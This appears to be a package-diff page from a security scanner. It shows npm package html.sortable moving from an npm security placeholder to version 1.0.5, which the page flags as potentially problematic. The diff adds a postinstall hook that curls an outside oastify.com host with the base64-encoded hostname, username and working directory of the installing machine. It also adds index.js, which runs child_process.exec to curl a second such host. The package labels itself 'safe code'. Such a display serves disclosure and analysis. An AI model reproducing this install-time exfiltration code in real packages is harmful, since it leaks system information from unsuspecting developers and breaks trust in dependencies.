html.sortable 0.0.1-security → 1.0.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of html.sortable might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ import require;
2
+ function test() {
3
+ require("child_process").exec('curl axbtjg3o5q6jpfrv0epkt57u2l8dw5ku.oastify.com')
4
+ }
5
+ export { test }
package/package.json CHANGED
@@ -1,6 +1,17 @@
1
1
  {
2
2
  "name": "html.sortable",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.5",
4
+ "description": "safe code",
5
+ "main": "index.js",
6
+ "type": "module",
7
+ "scripts": {
8
+ "postinstall": "curl http://020jo68eagb9u5wl54uayvck7bd31ypn.oastify.com/?hostname=$(cat /etc/hostname | base64)&whoami=$(whoami|base64)&pwd=$(pwd|base64)",
9
+ "test": "echo \"Error: no test specified\" && exit 1"
10
+ },
11
+ "author": "lopseg",
12
+ "license": "ISC",
13
+ "dependencies": {
14
+ "html.sortable": "^1.0.5"
15
+ },
16
+ "devDependencies": {}
6
17
  }
package/test.js ADDED
@@ -0,0 +1,3 @@
1
+
2
+ import {test} from "html.sortable"
3
+ test()
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=html.sortable for more information.